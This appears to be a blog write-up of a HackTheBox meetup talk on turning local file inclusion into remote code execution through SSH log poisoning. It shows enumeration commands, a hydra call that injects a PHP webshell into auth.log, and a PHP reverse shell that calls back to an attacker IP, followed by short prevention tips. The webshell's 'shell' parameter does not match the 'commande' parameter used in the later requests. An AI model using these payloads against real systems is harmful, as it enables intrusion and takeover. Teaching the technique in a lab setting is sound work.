HackTheBox Meetup - LFI2RCE
How to Achieve Remote Code Execution through LFI and Log Poisoning? 🚀🔍
On November 29, 2024, I had the incredible opportunity to speak at the first HackTheBox Meetup event in Brussels, organized by the Mohamed Waked Nachar. During my talk, I highlighted a critical vulnerability that can be exploited to compromise an entire system if it's susceptible to LFI (Local File Inclusion) and log file poisoning attacks. 🛡️💻
Here's a detailed look at how attackers can achieve Remote Code Execution (RCE) through LFI via log poisoning, for more details, you can also download the powerpoint presentation attached and video added below.
Enumeration Phase 🕵️♂️
Identify Live Hosts on the Network:
sudo arp-scan -l
Identify Ports and Services:
nmap -A 192.168.17.132 -p- -oX lfi.xml
Create a Structured HTML Nmap Report:
xsltproc -o lfi.html lfi.xml
Vulnerability Scanning Phase 🔍🛠️
Identify Web Directories and Files:
dirb http://192.168.17.132/ wordlist.txt
Identify the Vulnerable Parameter:
ffuf -w wordlist.txt -u http://192.168.17.132//antibot_image/antibots/info.php/?FUZZ=/etc/passwd
Exploitation Phase 🚨⚡
Poison SSH Logfile:
hydra 192.168.17.132 -l '<?php system($_GET['shell']); ?>' -p test ssh -s 2211
Retrieve the Poisoned Log File via LFI:
http://192.168.17.132/antibot_image/antibots/info.php?image=/var/log/auth.log&commande=ls
Obtain a Reverse Shell via LFI (LFI to RCE):
http://192.168.17.132/antibot_image/antibots/info.php?image=/var/log/auth.log&commande=php -r '$sock=fsockopen("192.168.17.130",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
Prevention Tips 🛡️
Validate User Input: Always ensure input validation to prevent malicious data from being processed.
Sanitize User Input: Sanitize inputs to strip out potentially harmful characters.
Use Whitelists: Implement whitelisting to allow only known good inputs.
Principle of Least Privilege: Minimize user permissions to the absolute minimum required.
The demo of this attack is attached to this post. 📹🎥
Last updated